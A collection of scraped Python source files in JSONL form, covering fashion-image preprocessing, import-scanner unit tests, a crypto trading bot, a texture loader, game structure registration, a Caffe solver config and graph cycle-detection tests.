+{"seq_id":"76583786","text":"import sys\nsys.path.append('/home/david/fashionAI/Gluon-FashionAI-Attributes/data/cocoapi/PythonAPI')\nfrom pycocotools.coco import COCO\nimport json\nimport csv\nimport cv2\nimport imutils\nfrom pathlib import Path\nimport pickle\nimport numpy as np\n\nBASE_SHAPE = 360\n\nrgb_mean = np.array([0.485, 0.456, 0.406])\nrgb_std = np.array([0.229, 0.224, 0.225])\n\nlabel_dict = {'coat_length_labels': [],\n 'lapel_design_labels': [],\n 'neckline_design_labels': [],\n 'skirt_length_labels': [],\n 'collar_design_labels': [],\n 'neck_design_labels': [],\n 'pant_length_labels': [],\n 'sleeve_length_labels': []}\n\ntransfered_label_dict = {'coat_length_labels': [],\n 'lapel_design_labels': [],\n 'neckline_design_labels': [],\n 'skirt_length_labels': [],\n 'collar_design_labels': [],\n 'neck_design_labels': [],\n 'pant_length_labels': [],\n 'sleeve_length_labels': []}\n\n# Train\n# dataset_json_file = '/data/david/fai_attr/gloun_data/detection_labels/train_val.json'\n# # results_json_file = '/data/david/fai_attr/gloun_data/detection_labels/train_val_results-v1.json'\n# results_json_file = '/data/david/fai_attr/gloun_data/detection_labels/train_val_results-v2.json'\n# dataset_path = '/data/david/fai_attr/raw_data/train_v1'\n# label_file_path = dataset_path + '/Annotations/train.csv'\n# outout_path = '/data/david/fai_attr/transfered_data/train_v4'\n\n# dataset_json_file = '/data/david/fai_attr/gloun_data/detection_labels/validation_v1.json'\n# results_json_file = '/data/david/fai_attr/gloun_data/detection_labels/validation_v1_detection_max_5.json'\n# dataset_path = '/data/david/fai_attr/raw_data/val_v1'\n# label_file_path = dataset_path + '/Annotations/val.csv'\n# outout_path = '/data/david/fai_attr/transfered_data/val_v2'\n\ndataset_json_file = '/data/david/fai_attr/gloun_data/detection_labels/test_v1.json'\nresults_json_file = '/data/david/fai_attr/gloun_data/detection_labels/test_v1_detection_max_5.json'\ndataset_path = '/data/david/fai_attr/raw_data/partial_test_for_val_v2'\nlabel_file_path = dataset_path + '/Annotations/test.csv'\noutout_path = '/data/david/fai_attr/transfered_data/partial_test_v2'\n\nfor file_path in [dataset_json_file, results_json_file, label_file_path]:\n assert Path(file_path).exists(), \"%s not exist\" % file_path\n\ndef find_label_by_path(task, img_path):\n for line in label_dict[task]:\n if img_path == line[0]:\n return line[1]\n return None\n\ndef convert_label_to_one_hot(raw_label):\n label_y = [int(l == 'y')*1 for l in raw_label]\n label_m = [int(l == 'm')*0.5 for l in raw_label]\n label = [x+y for x,y in zip(label_m, label_y)]\n return label\n\ndef normalize_image(data):\n return (data.astype('float32') / 255 - rgb_mean) / rgb_std\n\ncoco=COCO(dataset_json_file)\ndetections = json.load(Path(results_json_file).open())\n# [x['name'] for x in coco.cats.values()]\ncat_list = ['blouse', 'dress', 'outwear', 'skirt', 'trousers']\ntask_list = ['coat_length_labels', 'lapel_design_labels', 'neckline_design_labels', 'skirt_length_labels', 'collar_design_labels', 'neck_design_labels', 'pant_length_labels', 'sleeve_length_labels']\nno_dets_nums = 0\nmatch_nums = 0\n\nlabel_file_op = Path(label_file_path).open('r')\nlines = label_file_op.readlines()\ntokens = [l.rstrip().split(',') for l in lines]\nfor path, task, label in tokens:\n label_dict[task].append((path, label))\n\nfor img_id in coco.imgs:\n\n img_info = coco.imgs[img_id]\n task = img_info['file_name'].split('/')[1]\n img_path = Path(dataset_path, img_info['file_name'])\n\n # if not img_path.exists():\n # continue\n\n assert img_path.exists(), \"img_path %s not exists\" % img_path\n img_raw = cv2.imread(img_path.as_posix())\n raw_label = find_label_by_path(task, img_info['file_name'])\n\n # if raw_label is None:\n # continue\n\n one_hot_label = convert_label_to_one_hot(raw_label)\n\n dets = [det for det in detections if det['image_id'] == img_id]\n if len(dets) == 0:\n img_raw_resieze = cv2.resize(img_raw, (BASE_SHAPE, BASE_SHAPE))\n cv2.imwrite(Path(outout_path, img_info['file_name']).as_posix(), img_raw_resieze)\n transfered_label_dict[task].append((img_info['file_name'], task, raw_label, one_hot_label, [0, 0, 0, 0], \"UNKNOWN\"))\n no_dets_nums = no_dets_nums+1\n print(\"no dets for %s \" % img_info['file_name'])\n continue\n\n # TODO: choose best det here\n # task_list = ['coat_length_labels', 'lapel_design_labels', 'neckline_design_labels', 'skirt_length_labels', 'collar_design_labels', 'neck_design_labels', 'pant_length_labels', 'sleeve_length_labels']\n det_names = [coco.cats[det['category_id']]['name'] for det in dets]\n if task in ['sleeve_length_labels', 'coat_length_labels', 'lapel_design_labels', 'neckline_design_labels', 'collar_design_labels', 'neck_design_labels']:\n for cat_name in [\"outwear\", 'blouse', 'dress']:\n if cat_name in det_names:\n curent_det = dets[det_names.index(cat_name)]\n elif task in ['skirt_length_labels', 'sleeve_length_labels']:\n for cat_name in [\"skirt\", 'trousers', 'dress']:\n if cat_name in det_names:\n curent_det = dets[det_names.index(cat_name)]\n\n if curent_det is None:\n det = dets[0]\n print('category %s not match task: %s' % (coco.cats[det['category_id']]['name'], task))\n else:\n det = curent_det\n match_nums = match_nums + 1\n\n category_id = det['category_id']\n category_name = coco.cats[det['category_id']]['name']\n bbox = [int(i) for i in det['bbox']]\n\n cropped_img = img_raw[bbox[1]:bbox[1]+bbox[3], bbox[0]:bbox[0]+bbox[2]]\n c_h, c_w = cropped_img.shape[:2]\n max_dim = max(c_h, c_w)\n top_pad = (max_dim - c_h) // 2\n bottom_pad = max_dim - c_h - top_pad\n left_pad = (max_dim - c_w) // 2\n right_pad = max_dim - c_w - left_pad\n padding = [(top_pad, bottom_pad), (left_pad, right_pad), (0, 0)]\n cropped_img = np.pad(cropped_img, padding, mode='constant', constant_values=0)\n resize_img = cv2.resize(cropped_img, (BASE_SHAPE, BASE_SHAPE), interpolation=cv2.INTER_CUBIC)\n\n # cat_list = ['blouse', 'dress', 'outwear', 'skirt', 'trousers']\n # task_list = ['coat_length_labels', 'lapel_design_labels', 'neckline_design_labels', 'skirt_length_labels', 'collar_design_labels', 'neck_design_labels', 'pant_length_labels', 'sleeve_length_labels',]\n # if (category_name in [\"skirt\", 'trousers'] and task in ['pant_length_labels', 'skirt_length_labels']) or \\\n # (category_name in [\"outwear\", 'blouse'] and task in ['sleeve_length_labels', 'coat_length_labels', 'lapel_design_labels', 'neckline_design_labels', 'collar_design_labels', 'neck_design_labels']) or \\\n # (category_name == 'dress' and task in ['pant_length_labels', 'skirt_length_labels', 'sleeve_length_labels', 'coat_length_labels']):\n # print('category %s matches task: %s' % (category_name, task))\n # match_nums = match_nums + 1\n # for det in dets:\n # category_id = det['category_id']\n # category_name = coco.cats[det['category_id']]['name']\n # if (category_name in [\"skirt\", 'trousers'] and task in ['pant_length_labels', 'skirt_length_labels']) or \\\n # (category_name in [\"outwear\", 'blouse'] and task in ['sleeve_length_labels', 'coat_length_labels', 'lapel_design_labels', 'neckline_design_labels', 'collar_design_labels', 'neck_design_labels']) or \\\n # (category_name == 'dress' and task in ['skirt_length_labels', 'sleeve_length_labels', 'coat_length_labels']):\n # print('category %s matches task: %s' % (category_name, task))\n # match_nums = match_nums + 1\n # curent_det = det\n # break\n # height, width = img_raw.shape[:2]\n # if height > width:\n # img_raw = imutils.rotate_bound(img_raw, 270)\n # height, width = img_raw.shape[:2]\n # bbox = [bbox[1], width-bbox[0]-bbox[2], bbox[3], bbox[2]]\n # # print(\"get raw image %s at (%d, %d) \" % (img_path, img_raw.shape[0], img_raw.shape[1]))\n # center_x, center_y = bbox[0] + bbox[2]/2, bbox[1] + bbox[3]/2\n # if center_x <= height/2:\n # margin_x_right = height\n # cropped_img = img_raw[:, :margin_x_right]\n # elif center_x > height/2 and width - center_x < height/2:\n # margin_x_left = width - height\n # bbox[0] = bbox[0] - margin_x_left\n # cropped_img = img_raw[:, margin_x_left:]\n # elif center_x >= height/2 and width - center_x >= height/2:\n # margin_x_left = int(center_x - height/2)\n # bbox[0] = bbox[0] - margin_x_left\n # cropped_img = img_raw[:, margin_x_left:margin_x_left+height]\n # else:\n # raise RuntimeError()\n # # TODO: refix crop image depending on bbox\n # bbox[0] = 0 if bbox[0] < 0 else bbox[0]\n # assert cropped_img.shape[0] == cropped_img.shape[1], \"cropped_img should resized to same shape (%d, %d)\" % (cropped_img.shape[0], cropped_img.shape[1])\n # resize_img = cv2.resize(cropped_img, (BASE_SHAPE, BASE_SHAPE), interpolation=cv2.INTER_CUBIC)\n\n # post processing\n output_imgs_path = Path(outout_path, 'Images', task)\n if not output_imgs_path.exists():\n output_imgs_path.mkdir(parents=True)\n\n # 1. save image\n output_resized_img_path = Path(output_imgs_path, img_path.name)\n output_label_pkl_path = Path(output_imgs_path, img_path.stem+'.pkl')\n cv2.imwrite(output_resized_img_path.as_posix(), resize_img)\n # print(\"save image to %s as shape (%d, %d)\" % (output_resized_img_path, resize_img.shape[0], resize_img.shape[1]))\n # 2. save new labels\n transfered_label_dict[task].append((img_info['file_name'], task, raw_label, one_hot_label, bbox, category_name))\n # 3. TODO: save new labels to pkl\n # total_results = {\"image\": resize_img.astype(float), \"raw_label\": raw_label, \"one_hot_label\": one_hot_label}\n # pickle.dump(total_results, output_label_pkl_path.open(\"w\"))\n\nprint(\"total matched %d/%d\" % (match_nums, len(coco.imgs)))\nprint(\"no dets matched %d/%d\" % (no_dets_nums, len(coco.imgs)))\n\nfor task in transfered_label_dict.keys():\n csv_file_path = Path(outout_path, 'Annotations', \"%s.csv\" % task)\n if not csv_file_path.parent.exists():\n csv_file_path.parent.mkdir(parents=True)\n\n csv_file = csv_file_path.open('w+')\n spamwriter = csv.writer(csv_file)\n\n for line in transfered_label_dict[task]:\n file_name, task, raw_label, one_hot_label, bbox, category_name = line\n output_label_list = '_'.join([str(x) for x in one_hot_label])\n output_bbox_list = '_'.join([str(x) for x in bbox])\n spamwriter.writerow([file_name, task, raw_label, output_label_list, output_bbox_list, category_name])\n\n csv_file.close()\n print(\"finished writint %s \" % csv_file_path)\n\n\n# coco.imgs:\n# 4073319441911775229: {'id': 4073319441911775229, 'height': 512, 'width': 512, 'file_name': 'Images/skirt_length_labels/14cff0d4c1566b53937556a56a396cb0.jpg'}\n# detection\n# det = detections[0]\n# {'bbox': [141.21919476310723, 148.1283797967682, 268.367932953227, 336.9712621340266], 'score': 0.16471093893051147, 'image_id': 7322388807026071477, 'category_id': 1}\n# (Pdb) len(coco.imgs)\n# 89683\n# [('blouse', 19387), ('dress', 31065), ('outwear', 18212), ('skirt', 13191), ('trousers', 7822)]\n\n","sub_path":"scripts/preprocess_img_v2.py","file_name":"preprocess_img_v2.py","file_ext":"py","file_size_in_byte":11383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"264104183","text":"import unittest\n\nfrom unimport.constants import PY38_PLUS\nfrom unimport.scan import ImportableVisitor\nfrom unimport.session import Session\nfrom unimport.statement import Import, ImportFrom, Name\n\n\nclass ScannerTestCase(unittest.TestCase):\n maxDiff = None\n include_star_import = False\n\n def setUp(self):\n self.scanner = Session(\n include_star_import=self.include_star_import\n ).scanner\n\n def assertUnimportEqual(\n self,\n source,\n expected_names=[],\n expected_imports=[],\n ):\n self.scanner.scan(source)\n self.assertEqual(expected_names, self.scanner.names)\n self.assertEqual(expected_imports, self.scanner.imports)\n self.scanner.clear()\n\n\nclass TestNames(ScannerTestCase):\n def test_names(self):\n source = (\n \"variable = 1\\n\"\n \"variable1 = 2\\n\"\n \"class TestClass:\\n\"\n \"\\tpass\\n\"\n \"def function():\\n\"\n \"\\tpass\"\n )\n self.assertUnimportEqual(\n source,\n expected_names=[\n Name(lineno=1, name=\"variable\"),\n Name(lineno=2, name=\"variable1\"),\n ],\n )\n\n def test_names_with_import(self):\n source = (\n \"variable = 1\\n\"\n \"import os\\n\"\n \"class TestClass():\\n\"\n \"\\tdef test_function(self):\\n\"\n \"\\t\\tpass\\n\"\n \"def test_function():\\n\"\n \"\\tpass\"\n )\n self.assertUnimportEqual(\n source,\n expected_names=[Name(lineno=1, name=\"variable\")],\n expected_imports=[Import(lineno=2, column=1, name=\"os\")],\n )\n\n def test_names_with_function(self):\n self.assertUnimportEqual(\n source=\"variable = 1\\n\" \"def test():\\n\" \"\\tpass\",\n expected_names=[Name(lineno=1, name=\"variable\")],\n )\n\n def test_names_with_class(self):\n source = (\n \"variable = 1\\n\"\n \"def test_function():\\n\"\n \"\\tpass\\n\"\n \"class test():\\n\"\n \"\\tdef test_function():\\n\"\n \"\\t\\tpass\"\n )\n self.assertUnimportEqual(\n source,\n expected_names=[Name(lineno=1, name=\"variable\")],\n )\n\n def test_decator_in_class(self):\n source = (\n \"class Test:\\n\"\n \" def test(self):\\n\"\n \" def test2():\\n\"\n \" return 'test2'\\n\"\n \" return test2\\n\"\n )\n\n self.assertUnimportEqual(\n source,\n expected_names=[Name(lineno=5, name=\"test2\")],\n )\n\n\nclass SkipImportTest(ScannerTestCase):\n def assertSkipEqual(self, source):\n super().assertUnimportEqual(\n source,\n )\n\n def test_inside_try_except(self):\n source = (\n \"try:\\n\"\n \" import django # unimport:skip\\n\"\n \"except ImportError:\\n\"\n \" print('install django')\\n\"\n )\n self.assertSkipEqual(source)\n\n def test_as_import(self):\n source = \"from x import y as z # unimport:skip\\n\"\n self.assertSkipEqual(source)\n\n def test_ongoing_comment(self):\n source = \"import unimport # unimport:skip import test\\n\"\n self.assertSkipEqual(source)\n\n def test_skip_comment_second_option(self):\n source = \"import x # unimport:skip test\\n\"\n self.assertSkipEqual(source)\n\n def test_noqa_skip_comment(self):\n source = \"from x import (t, y, f, r) # noqa\\n\"\n self.assertSkipEqual(source)\n\n def test_noqa_skip_comment_multiple(self):\n source = \"from x import ( # noqa\\n\" \" t, y,\\n\" \" f, r\\n\" \")\\n\"\n self.assertSkipEqual(source)\n\n def test_skip_file(self):\n source = \"# unimport:skip_file\\n\" \"import x\\n\"\n self.assertSkipEqual(source)\n\n def test_skip_file_after_import(self):\n source = \"import x\\n\" \"# unimport:skip_file\\n\"\n self.assertSkipEqual(source)\n\n\n@unittest.skipIf(\n not PY38_PLUS, \"This feature is only available for python 3.8.\"\n)\nclass TestTypeComments(ScannerTestCase):\n def test_type_comments(self):\n source = (\n \"from typing import Any\\n\"\n \"from typing import Tuple\\n\"\n \"from typing import Union\\n\"\n \"def function(a, b):\\n\"\n \" # type: (Any, str) -> Union[Tuple[None, None], Tuple[str, str]]\\n\"\n \" pass\\n\"\n )\n expected_names = [\n Name(lineno=1, name=\"Any\"),\n Name(lineno=1, name=\"Union\"),\n Name(lineno=1, name=\"Tuple\"),\n Name(lineno=1, name=\"Tuple\"),\n ]\n expected_imports = [\n ImportFrom(\n lineno=1, column=1, name=\"Any\", star=False, suggestions=[]\n ),\n ImportFrom(\n lineno=2,\n column=1,\n name=\"Tuple\",\n star=False,\n suggestions=[],\n ),\n ImportFrom(\n lineno=3, column=1, name=\"Union\", star=False, suggestions=[]\n ),\n ]\n self.assertUnimportEqual(\n source,\n expected_names,\n expected_imports,\n )\n\n\nclass TestImportable(unittest.TestCase):\n maxDiff = None\n\n def setUp(self):\n self.importable = ImportableVisitor()\n\n def test_get_names_from_all(self):\n source = (\n \"__all__ = ['test']\\n\"\n \"__all__.append('test2')\\n\"\n \"__all__.extend(['test3'])\\n\"\n \"\\n\"\n )\n expected = frozenset({\"test3\", \"test\", \"test2\"})\n self.importable.traverse(source)\n self.assertEqual(expected, self.importable.get_all())\n\n def test_get_names_from_suggestion(self):\n source = (\n \"import xx\\n\"\n \"class A:\\n\"\n \" pass\\n\"\n \"def b():\\n\"\n \" FUNCNAME = 'test'\\n\"\n \"NAME='NAME'\\n\"\n \"\\n\"\n )\n expected = frozenset({\"xx\", \"NAME\", \"b\", \"A\"})\n self.importable.traverse(source)\n self.assertEqual(expected, self.importable.get_suggestion())\n","sub_path":"tests/test_scanner.py","file_name":"test_scanner.py","file_ext":"py","file_size_in_byte":6135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"467445888","text":"import pyupbit\nimport time\nimport datetime\n\n\nwith open(\"upbit.txt\") as f:\n lines = f.readlines()\n key = lines[0].strip()\n secret = lines[1].strip()\n upbit = pyupbit.Upbit(key, secret)\n\n'''\n내 잔고 조회\n'''\nupbit = pyupbit.Upbit(key, secret)\nprint(upbit.get_balances())\n\n'''\n변동성 돌파 목표가 계산을 위한 함수\n'''\ndef get_target_price(ticker):#재사용을 위해 함수 선언\n df = pyupbit.get_ohlcv(ticker)\n yesterday = df.iloc[-2]#끝에서 2번째인 전일 데이터를 가지고 온다.\n today_open = yesterday['close']#당일 시가를 얻어온다.\n yesterday_high = yesterday['high']#전일 고가를 얻어온다.\n yesterday_low = yesterday['low']#전일 저가를 얻어온다.\n target = today_open + (yesterday_high - yesterday_low)#변동성 돌파 목표가 계산\n return target\n\n\n'''\n매도 함수\n'''\ndef sell_crypto_currency(ticker):\n unit = upbit.get_balances()\n upbit.sell_market_order(ticker, unit)#해당 코인을 시장가로 매매\n\n'''\n매일 정각이 되면 목표가를 계산하여 갱신\n'''\nwhile True:\n try:\n now = datetime.datetime.now()#현재 시간 조회\n mid = datetime.datetime(now.year, now.month, now.day, 9) # 오전 9시를 고정으로 잡는다.\n if mid < now < mid + datetime.delta(seconds=10):#00시를 초단위로 정확하게 알지 못하기 떄문에 10초의 범위안에서 실행하게 한다.\n sell_crypto_currency(\"KRW-BTC\")#모든 코인을 매도\n target_price = get_target_price(\"KRW-BTC\")#목표가 계산\n\n\n current_price = pyupbit.get_current_price(\"KRW-BTC\")#현재가 조회\n if current_price > target_price:#현재가가 목표가보다 높은지 검사\n buy_crypto_currency(\"KRW-BTC\")#매수\n except:\n print(\"에러 발생\")\n time.sleep(1)\n\n","sub_path":"upbitauto.py","file_name":"upbitauto.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"327879468","text":"import logging\r\nfrom typing import Any, Tuple\r\n\r\ntry:\r\n from PIL import Image\r\nexcept ImportError as ex:\r\n raise ImportError(\"Texture loader 'PillowLoader' requires Pillow: {}\".format(ex))\r\n\r\nfrom moderngl_window.loaders.base import BaseLoader\r\nfrom moderngl_window.exceptions import ImproperlyConfigured\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\nclass PillowLoader(BaseLoader):\r\n \"\"\"Base loader using PIL/Pillow\"\"\"\r\n kind = '__unknown__'\r\n\r\n def __init__(self, meta):\r\n super().__init__(meta)\r\n self.image = None\r\n\r\n def load(self) -> Any:\r\n raise NotImplementedError()\r\n\r\n def _open_image(self):\r\n if self.meta.image:\r\n self.image = self.meta.image\r\n else:\r\n self.meta.resolved_path = self.find_texture(self.meta.path)\r\n logger.info(\"loading %s\", self.meta.resolved_path)\r\n if not self.meta.resolved_path:\r\n raise ImproperlyConfigured(\"Cannot find texture: {}\".format(self.meta.path))\r\n\r\n self.image = Image.open(self.meta.resolved_path)\r\n\r\n if self.meta.flip:\r\n self.image = self.image.transpose(Image.FLIP_TOP_BOTTOM)\r\n\r\n def _close_image(self):\r\n self.image.close()\r\n\r\n\r\ndef image_data(image: Image) -> Tuple[int, bytes]:\r\n \"\"\"Get components and bytes for an image.\r\n The number of components is assumed by image\r\n size and the byte length of the raw data.\r\n\r\n Returns:\r\n Tuple[int, bytes]: Number of components, byte data\r\n \"\"\"\r\n # NOTE: We might want to check the actual image.mode\r\n # and convert to an acceptable format.\r\n # At the moment we load the data as is.\r\n data = image.tobytes()\r\n components = len(data) // (image.size[0] * image.size[1])\r\n logger.debug(\"image_data size=[%s, %s] components=%s bytes=%s\", image.size[0], image.size[1], components, len(data))\r\n return components, data\r\n","sub_path":"moderngl_window/loaders/texture/pillow.py","file_name":"pillow.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"192759993","text":"from outpost_server.core import use, util\nfrom outpost_server.core.data import DATA\nfrom outpost_server.outpost.lib import autorotate, door, mallet, structure_items, tool, ward\n\nautorotate.register_floor('road')\nmallet.register('road/', mallet.TERRAIN_VARIANTS)\n\nautorotate.register_floor('house_floor', 'wood_floor')\nmallet.register('wood_floor/', mallet.TERRAIN_VARIANTS)\n\nfor color in ('red', 'orange', 'yellow', 'green', 'blue', 'purple'):\n autorotate.register_floor('wood_floor/' + color)\n mallet.register('wood_floor/%s/' % color, mallet.TERRAIN_VARIANTS)\n\n\n\n\nautorotate.register_fence('fence', 'fence_post')\nmallet.register('fence/', mallet.WALL_VARIANTS)\nmallet.register('fence/', ('end/fancy/e', 'end/fancy/w'))\nstructure_items.register('fence_gate', 'fence/gate/closed', tool='axe')\ndoor.register_use('fence/gate', tool_name='axe')\n\n\nstructure_items.register('bed')\nstructure_items.register('double/bed')\nstructure_items.register('trophy')\nstructure_items.register('fountain')\nstructure_items.register('stair', 'stair/n')\nstructure_items.register('wood_pillar', 'pillar/wood')\nstructure_items.register('stone_pillar', 'pillar/stone')\nstructure_items.register('statue', 'statue/e')\nmallet.register('statue/', ('e', 's', 'w', 'n'))\n\nstructure_items.register('table')\nstructure_items.register_base('table', 'table')\nstructure_items.register('iron/table')\nstructure_items.register_base('iron/table', 'table')\n\nstructure_items.register('torch')\nfor color in ('red', 'orange', 'yellow', 'green', 'blue', 'purple'):\n structure_items.register('torch/' + color)\n\n\n\nLAMP_ITEM = DATA.item('lamp')\nLAMP = DATA.template('lamp')\nLAMP_OFF = DATA.template('lamp/off')\nLAMP_ATTACHED = DATA.template('lamp/attached')\nLAMP_OFF_ATTACHED = DATA.template('lamp/off/attached')\n\nLAMP_TOGGLE = {\n LAMP: LAMP_OFF,\n LAMP_OFF: LAMP,\n LAMP_ATTACHED: LAMP_OFF_ATTACHED,\n LAMP_OFF_ATTACHED: LAMP_ATTACHED,\n }\n\n@use.structure(LAMP)\n@use.structure(LAMP_OFF)\n@use.structure(LAMP_ATTACHED)\n@use.structure(LAMP_OFF_ATTACHED)\ndef use_lamp(e, s, args):\n ward.check(e, s.pos())\n s.replace(LAMP_TOGGLE[s.template()])\n\n@tool.axe(LAMP)\n@tool.axe(LAMP_OFF)\n@tool.axe(LAMP_ATTACHED)\n@tool.axe(LAMP_OFF_ATTACHED)\ndef axe_lamp(e, s, args):\n structure_items.take(e, s, LAMP_ITEM)\n\n@use.item(LAMP_ITEM)\ndef place_lamp(e, args):\n if structure_items.check_attachment(LAMP_ATTACHED, e.plane(), util.hit_tile(e)):\n structure_items.place(e, LAMP_ITEM, LAMP_ATTACHED)\n else:\n structure_items.place(e, LAMP_ITEM, LAMP)\n\nstructure_items.register_attachment(LAMP_ATTACHED, 'table')\nstructure_items.register_attachment(LAMP_OFF_ATTACHED, 'table')\n\n\n\ndef wall_and_door(name, tool, extra_variants=()):\n horiz_variants = ('edge/horiz',) + extra_variants\n\n autorotate.register_wall('%s_wall' % name)\n mallet.register('%s_wall/' % name,\n horiz_variants + mallet.COMMON_WALL_VARIANTS)\n structure_items.register('%s_door' % name, '%s_wall/door/closed' % name, tool)\n door.register_use('%s_wall/door' % name, tool_name=tool)\n\n for v in horiz_variants:\n structure_items.register_base('%s_wall/%s' % (name, v), 'wall/horiz')\n structure_items.register_base('%s_wall/tee/n' % name, 'wall/horiz')\n\nwall_and_door('interior', 'axe')\nwall_and_door('brick', 'pickaxe')\nwall_and_door('wood', 'axe', ('window/v0',))\nwall_and_door('stone', 'pickaxe', ('window/v0', 'window/v1',))\nwall_and_door('cottage', 'axe',\n ('variant/v0', 'variant/v1', 'variant/v2', 'window/v0', 'window/v1',))\nwall_and_door('iron', 'pickaxe')\n\n# ruined_wall doesn't have a proper door, so we can't use wall_and_door\nautorotate.register_wall('ruined_wall')\nmallet.register('ruined_wall/',\n ('edge/horiz', 'window/v0', 'window/v1',) + mallet.WALL_VARIANTS)\nstructure_items.register('ruined_door', 'ruined_wall/door/open', 'pickaxe')\n","sub_path":"scripts/outpost/structure_items.py","file_name":"structure_items.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"222694020","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import print_function\r\nimport caffe\r\nfrom caffe import layers as L\r\nfrom caffe import params as P\r\nfrom google.protobuf import text_format\r\nimport os\r\nimport sys\r\nimport math\r\nfrom HandPoseData import *\r\nfrom HandPoseNet import *\r\nsys.dont_write_bytecode = True\r\n##################################################################################\r\ncaffe_root = \"/home/zhangming/work/remodet_repository\"\r\n# --------------------------------Model Info--------------------------------------\r\nProject = \"HandPoseNet\"\r\nBaseNet = \"ResNet\"\r\nModels = \"96input_B128ConvInitLr0\"\r\nVer = \"1A\"\r\nSpecs = \"\"\"\r\nTest.\r\n\"\"\"\r\nPretrained_Model = \"/home/zhangming/Models/PretainedModels/ResNetPoseDet_V1-B48_C1S-C2S_MultiScale_A6iter300000_Conv1.caffemodel\"\r\n#Pretrained_Model = \"/home/ethan/Models/Results/HandPoseNet/ResNet_96input_1A/Models/ResNet_96input_1A_iter_40000.caffemodel\"\r\nResults_dir = \"/home/zhangming/Models/Results\"\r\n# -----------------------------config for computation----------------------------\r\ngpus = \"1\"\r\nresume_training = False\r\ntest_initialization = True\r\nsnapshot_after_train = True\r\nremove_old_models = False\r\n# --------------------------------solver Param-----------------------------------\r\nupdate_batchsize = 1*train_batchsize\r\ntrain_max_itersize = 500000\r\nbase_lr = 5e-4\r\nweight_decay = 0.0005\r\nlr_policy = \"step\"\r\nstepsize = 40000\r\n# stepvalue = [100000,200000,300000]\r\nstepvalue = [200000,350000,500000]\r\ngamma = 0.1\r\nmomentum = 0.9\r\nsnapshot = 10000\r\naverage_loss = 20\r\ndisplay = 20\r\nsolve_type = \"Adam\" # Adam / SGD\r\ndebug = False\r\ntest_interval = 1000\r\neval_type = \"handpose\"\r\nrandom_seed = 150\r\ntest_compute_loss = True\r\n# ################################################################################\r\n# --------------------------------DO NOT MODIFIED--------------------------------\r\n# get gpus\r\ndef get_gpus():\r\n return gpus\r\n# get num of gpus\r\ndef get_gpunums():\r\n return len(get_gpus().split(','))\r\n# get update iters\r\ndef get_update_iter():\r\n return int(math.ceil(float(update_batchsize) / (train_batchsize * get_gpunums())))\r\n# get solver mode of caffe\r\ndef get_solver_mode():\r\n if get_gpunums() > 0:\r\n return P.Solver.GPU\r\n else:\r\n return P.Solver.CPU\r\n# get device id of root solver\r\ndef get_device_id():\r\n if get_gpunums() > 0:\r\n return int(get_gpus().split(',')[0])\r\n else:\r\n return -1\r\ndef get_test_iter_for_project():\r\n return [get_test_iter()]\r\n# --------------------------------Source Params-----------------------------------\r\n# get solver param\r\ndef get_solver_param():\r\n return {\r\n # learning rate and update hyper-params\r\n 'base_lr': base_lr,\r\n 'weight_decay': weight_decay,\r\n 'lr_policy': lr_policy,\r\n 'stepsize': stepsize,\r\n 'stepvalue':stepvalue,\r\n 'gamma': gamma,\r\n 'momentum': momentum,\r\n 'iter_size': get_update_iter(),\r\n 'max_iter': train_max_itersize,\r\n 'snapshot': snapshot,\r\n 'display': display,\r\n 'average_loss': average_loss,\r\n 'type': solve_type,\r\n 'solver_mode': get_solver_mode(),\r\n 'device_id': get_device_id(),\r\n 'debug_info': debug,\r\n 'snapshot_after_train': snapshot_after_train,\r\n # Test parameters\r\n 'test_interval': test_interval,\r\n 'test_iter':get_test_iter_for_project(),\r\n 'test_net_type': [eval_type,],\r\n 'test_initialization': test_initialization,\r\n 'test_compute_loss': test_compute_loss,\r\n 'random_seed' : random_seed,\r\n }\r\n","sub_path":"remodet_repository_wdh_part/Projects/HandPose/solverParam.py","file_name":"solverParam.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"532392208","text":"from project.demoHasCycleUF import writeResults\nimport project.GraphGenerator as GraphGenerator\nimport graph.Graph_AdjacencyList\nimport graph.Graph_IncidenceList\nimport graph.Graph_AdjacencyMatrix\n\n\n@writeResults\ndef hasCycleDFSTest(G):\n \"\"\"\n Esegue una visita DFS nel grafo G a partire dal primo nodo. Mantiene bool di marcatura per ogni nodo\n tramite indicizzazione diretta su una lista, verifica se ci sono archi all'indietro, ovvero da un nodo\n ad uno già visitato che non ne sia il padre. Se non ci sono archi all'indietro il grafo è aciclico.\n :param G: Graph.\n :return: bool.\n \"\"\"\n rootId = list(G.nodes.keys())[0]\n visited = [False for _ in G.nodes] # inizializza la lista di marcatura\n return hasCycleDFSRecursive(G, rootId, visited, rootId) # inizia la visita vera e propria\n\n\ndef hasCycleDFSRecursive(G, v, visited, fatherId):\n visited[v] = True # marca il nodo v come visitato\n for adjNode in G.getAdj(v):\n if not visited[adjNode]:\n if hasCycleDFSRecursive(G, adjNode, visited, v): # se la chiamata ricorsiva individua un ciclo\n return True # ritorna True\n elif adjNode != fatherId:\n return True\n\n return False\n\n\ndef repeatedTest(graphImpl, maxN, steps):\n # per semplicita' si assuma maxN % steps = 0\n assert graphImpl in range(3)\n file = open(\"hasCycleDFSTest.txt\", \"a\")\n\n delta = int(maxN / steps)\n\n if graphImpl == 0:\n file.write(\"AdjacencyList:\\n\")\n elif graphImpl == 1:\n file.write(\"IncidenceList:\\n\")\n else:\n file.write(\"AdjacencyMatrix:\\n\")\n\n file.close()\n\n temp = delta\n while temp <= maxN:\n if graphImpl == 0:\n G = graph.Graph_AdjacencyList.GraphAdjacencyList()\n elif graphImpl == 1:\n G = graph.Graph_IncidenceList.GraphIncidenceList()\n else:\n G = graph.Graph_AdjacencyMatrix.GraphAdjacencyMatrix()\n GraphGenerator.generateRandGraph(G, temp)\n\n hasCycleDFSTest(G)\n temp += delta\n\n 